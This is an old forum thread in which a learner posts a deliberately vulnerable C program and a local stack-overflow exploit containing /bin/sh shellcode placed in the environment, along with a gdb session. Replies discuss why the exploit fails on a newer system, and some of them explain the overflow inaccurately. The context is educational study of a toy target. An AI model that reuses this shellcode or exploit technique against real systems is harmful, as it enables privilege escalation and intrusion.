I try to understand better how buffer overflow works using the following good document : http://arxiv.org/pdf/cs.CR/0405073 (french language) However, I can't reproduce an easy exemple (using environment) of buffer overflow on my system, I tryed other basical codes found on internet and still nothing, here is my code : // ---------- vuln2.c #include <stdio.h> main(int argc, char *argv[]) { char buffer[16]; if (argc > 1) strcpy(buffer, argv[1]); } // ----------- ex2.c #include <stdio.h> #define BUFSIZE 40 #define ALIGNMENT 0 char sc[] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; void main() { char *env[2] = {sc, NULL}; char buf[BUFSIZE]; int i; int *ap = (int *)(buf + ALIGNMENT); int ret = 0xbffffffa - strlen(sc) - strlen("/home/programming/vuln2"); for (i=0; i < BUFSIZE - 4; i += 4) { *ap++ = ret; } execle("/home/programming/vuln2", "vuln2", buf, NULL, env); } If I believe what I learnt, ex2 should provide a new shell : [user@host]$ ./ex2 Erreur de segmentation (core dumped) [user@host]$ This is not really the case... Trying to see what happens with gdb : [user@host]$ gdb -c core.10045 GNU gdb 6.3-5mdk (Mandriva Linux release 2006.0) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandriva-linux-gnu". Reading symbols from shared object read from target memory...(no debugging symbols found)...done. Using host libthread_db library "/lib/tls/libthread_db.so.1". Loaded system supplied DSO at 0xffffe000 Core was generated by `foo2 Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿Èÿÿ¿'. Program terminated with signal 11, Segmentation fault. #0 0xbfffffc8 in ?? () (gdb) x/12 0xbfffffc8 0xbfffffc8: Error accessing memory address 0xbfffffc8: Aucun fichier ou répertoire de ce type. (gdb) p $eip $1 = (void *) 0xbfffffc8 (gdb) p $esp $2 = (void *) 0xbfe8fec0 (gdb) x/12 0xbfe8fec0 0xbfe8fec0: 0xbfffffc8 0xbfffffc8 0xbfffffc8 0x0804844a 0xbfe8fed0: 0x08049654 0x00000000 0xb7f93cc0 0xbfe8ff08 0xbfe8fee0: 0xbfe8fec0 0xb7e4be05 0x00000000 0x00000000 (gdb) It's like if 0xbffffffa is not the limit address as described, do somebody understand what is wrong here ? For information my system is a Mandriva 2006 with kernel 2.6.12-12mdk-i686-up-4GB.
Hello, I will focus on vuln2 as the other one is too complex for a rocky. This code will crash if you use an argument longer than 15 characters. Simply try this one: ./vuln2 123456789012345678901234567 and you will get a segmentation error. Why ? Because the buffer variable can contain only 15 characters. The strcpy() function will add a NULL as well thus leading to a 16 characters strings. Now, if you add more than 15 characters to the variable, you will fill up the buffer with your 15 items and the remaining will overtake your stack, entering the code module, and destroying it; the if (argc > 1) will become unreadable and crash the program. This is a very common programming error as C is very permissive with buffer overflow, unlink other languages. Now in a more complex program, you could imagine exploiting a buffer overflow injecting code; this is what your second example is showing. Hope this helps. Cheers. Thibaut
Hello Thibaut Well, I'm a confirmed C developer and I know about segfault case. I try to increase my skills learning everything about buffer overflow : I have no problem to exploit a buffer overflow trying to find the ret addr and launching the program several time with a different offset, but I can't reproduce the local exploit that should work 100% of try with env technic... My problem is I try to understand why every tutorial writes that this exploit code works when it's not working on my computer. I have an idea why this happens and why it's not working, but I don't find any solution in order to exploit vuln2 with a working program that will success 100% of try as teached by the tutorial, probably only people that are used to work in this domain can help me.
Try this. It's a C code. #include <stdio.h> #include <stdlib.h> void recursion() { malloc(100000); recursion(); } int main() { recursion(); }
Yes of course... I don't really want to crash my memory. If it's all you know about C just don't reply to this topic.
Probably something like this. It seems when they did this tutorial gcc version was prior to 3, a lot of thing changed since... I guess in my environment (because of gcc or kernel ?) 0xbffffffa is not anymore the starting adress to stock program name and environment variables. I will go forward in my documentation.
Its easy to check. Simply create a pointer to the beginning of your code and retrieve its address. You should be around of the starting address. Cheers. Thibaut